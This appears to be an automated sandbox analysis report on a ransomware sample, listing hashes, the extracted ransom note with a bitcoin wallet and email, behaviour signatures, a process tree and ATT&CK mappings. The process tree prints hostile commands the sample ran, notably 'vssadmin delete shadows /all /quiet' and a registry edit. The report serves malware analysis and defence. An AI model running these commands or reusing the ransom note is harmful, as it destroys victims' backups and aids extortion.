Overview

overview

10

Static

static

6.exe_.exe

windows7_x64

10

6.exe_.exe

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    30-10-2020 05:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6.exe_.exe

  • Size

    26KB

  • MD5

    0f0d5631cc8749e8a8a2f61ca909dcfc

  • SHA1

    ee79e938a80d1d0a955899f56d5f8f37bee38de0

  • SHA256

    e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a

  • SHA512

    5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note
Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $200 worth of bitcoin to wallet: 3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq after payment,we will send you Decryptor software contact email: bondbond1@protonmail.com Your personal ID: d09TwldPIleGCR2Y1zdbtIoE64jLQTrKMQfIhztxUqd4j3PCaIGCeNqrxj1ZBQa/MZd+ProqyE6NQmq7tOfrl4EtnfZn+5catCOgp8Rnohnq97ELsWjoUTXPdLejXeSbPOBXp804zv6pJuLtvO1LAfJ0qm1lMFCur0R9JSttCbA=
Emails

bondbond1@protonmail.com

Wallets

3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq

Signatures

  • UAC bypass 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6.exe_.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2000
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1292
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1560
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt7
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:760
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1
T1031

Privilege Escalation

Bypass User Account Control

1
T1088

Defense Evasion

Bypass User Account Control

1
T1088

Disabling Security Tools

1
T1089

Modify Registry

4
T1112

File Deletion

2
T1107

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Inhibit System Recovery

2
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    191719adfa0a348195c83103586b5905

    SHA1

    fbc775b9f645124b1dd37f1eab7087b1a5d0bf57

    SHA256

    ee4b7ef74bf224d4d0cb065ce94d9dddb574f70e7afb3aaf5bf4b7bf53c0a983

    SHA512

    9bdc8de49869b23e64aa2867207d5dda36a1b714c8b0b1647411e57cfe485414685b1a120a7ea73a71e230384b3fdc25282edf6d370011312a528460815082de

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\s7iy1jn\imagestore.dat
    MD5

    c61cd898b477ed17e75cec6f6471813d

    SHA1

    40011d808c0282ce8adb9e2c6c6e831aa3bbc67b

    SHA256

    af4dadc1cfc2f4db490ec7b66e36587b18ad3e7ac2582f336dac91127d3c54c9

    SHA512

    ab9541be776005fd270ac71ab1cc4bbc9dbed1e5c5db35b0dfefae43dd3439c0595271da5aad2323c630fe6749a2397a3649194a49f8d79a7c0ba39c996a847d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CWT9VBTE.txt
    MD5

    71c3c45b5899fd410c5af50a95735b92

    SHA1

    efe186d8d83d2897ac966a08724ea5ac9b59f84c

    SHA256

    658f10e1f39a02f3a715d3b50af114088cd85d4129de05dbc253bf31cb7a1300

    SHA512

    241eeb763a3af9f0745f09eab158870b44e13a8a4f58a86d76ccbbe516419557c4e3315f00973294cd1a92e3f3139f53fb30ff65836fe9dae75d2d1ff339434c

    Download Submit
  • memory/760-11-0x0000000000000000-mapping.dmp
    Download
  • memory/848-9-0x0000000000000000-mapping.dmp
    Download
  • memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmp
    Filesize

    2.5MB

    Download
  • memory/1028-4-0x0000000000000000-mapping.dmp
    Download
  • memory/1168-3-0x0000000000000000-mapping.dmp
    Download
  • memory/1292-5-0x0000000000000000-mapping.dmp
    Download
  • memory/1560-8-0x0000000000000000-mapping.dmp
    Download
  • memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-7-0x0000000000000000-mapping.dmp
    Download
  • memory/2000-6-0x0000000000000000-mapping.dmp
    Download